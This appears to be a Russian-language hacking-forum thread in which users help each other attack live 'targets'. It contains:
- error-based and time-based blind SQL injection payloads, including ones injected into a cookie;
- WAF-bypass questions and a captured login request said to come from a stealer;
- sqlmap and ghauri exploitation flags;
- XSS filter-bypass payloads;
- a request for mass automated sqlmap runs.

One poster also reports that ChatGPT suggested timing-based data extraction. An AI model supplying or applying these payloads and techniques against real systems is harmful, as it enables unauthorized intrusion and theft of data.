del
Последнее редактирование:
было подобное со знаком _ на одном таргете ..тоже тут просил подмогнуть , решения так и не нашлиПривет всем. Возникла сложность с обходом одного фильтра. Вобщем ваф похоже срезает весь пейлоад после знака _
У меня ерорка, я пытаюсь отправить пейлоад вида 10' and extractvalue(1,concat(0x5E,(select count(user) from db.table_name)))-- -
Но имя бд и таблицы имеют этот злоебучий знак и из за него не получается. Плюс они еще в таком месте стоят, после фрома, что их нельзя просто в виде хекса добавить, не будет работать. И я вот что то реально пока не могу догнать как именно это возможно вообще написать запрос без этого знака. Прошу помощи.
Это печальнобыло подобное со знаком _ на одном таргете ..тоже тут просил подмогнуть , решения так и не нашли
POST {ur;}php HTTP/1.1
Host: {host}
Content-Length: 41
Cache-Control: max-age=0
Accept-Language: ru-RU,ru;q=0.9
Origin: {origin}
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: {random-agent}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: {refer}
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID={phpsessid}
Connection: keep-alive
user=admin&pass=321312321312&button=LOGIN
с помощью стиллераP.S. А всё же интересно как нашли тот URL (см. выше) типа:
Попробуй убрать. А вообще, в такой ситуации особо ничего не посоветовать. Надо видеть таргет.Content-Length: 41
у мапы нет такого пейлоада и ты не выкрутишь его. Насколько я знаю, как то его там можно добавить, и использовать с какими то тамперами, но проще всего тебе использовать ghauri. --dbms=mysql -tec=tПривет всем.Окунь нашел sql в Сookie ,
Cookie input 8c9509c4c273653a829fb5b4b7b43dbb was set to 25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z
Tests performed:
25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.293
25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.277
25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.299
25653c929274dd35610e8868ce2c7e6b0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z =>0.272
Пробовал раскрутить его мапом с разными параметрами ,но никак не выходит,не воспринимает он куки как параметр.Шайтан ГПТ пытался пропихнуть идею о подборе символов (названия таблиц) исходя из задержек ответа,ничего хорошего не вышло.Поиск по форуму ничего не дал.Правильно ли я понимаю что дальше нужно крутить Берпом?Заранее благодарю за ответ.
ghauri с разными параметрами тоже не смог ее найти,но все равно спасибо)у мапы нет такого пейлоада и ты не выкрутишь его. Насколько я знаю, как то его там можно добавить, и использовать с какими то тамперами, но проще всего тебе использовать ghauri. --dbms=mysql -tec=t
тогда попрбуй в sqlmap добавить флаги --prefix='"' --dbms=mysql --tec=t (просто можешь скопировать, добавить к своим флагам)ghauri с разными параметрами тоже не смог ее найти,но все равно спасибо)
больше понравился чем мапа
https://github.com/sqlmapproject/sqlmap/wiki/Usage#custom-injection-payload--prefix=PREFIX Полезная нагрузка в строке преффикса
--suffix=SUFFIX Полезная нагрузка в строке суффикса
а что это за строка префикса и суфикса? sqlmap

JavaScript запретили в Хроме? Вот это новость!Хотелось бы узнать о простой вещи в хроме:
Действительно ли сейчас в хроме для поиска xss уязвимости нельзя использовать <script>…</script>, если это так, то что вы используете в качестве альтернативы? Возможно вопрос задан коряво, я просто начинаю свой путь, прошу строго не судить.![]()
<img src="" onerror="alert(1)"/> альтернативы до <scr<script>ipt>...</scri<script>pt> если "выкусыватель бяки" нерекурсивный. Больше можно поискать на hacktricks каком-нибудь, ну или зная особенности жертвы - придумать обход. Метод сокрытия вредоносного пэйлоада в целом называется obfuscation, например "XSS obfuscation" , "SQLi obfuscation", "shellcode obfuscation", etc.Мне в голову приходит только то, что можно сделать батник, в нем все прописать и запускать.подскажите как автоматизировать sqlmap , что бы задать список линков уже с командами , например 10-100 штук сразу, что бы не открывтаь окна на каждую цель, я мею в виду что бы он одновременно раскручивал их. Спасибо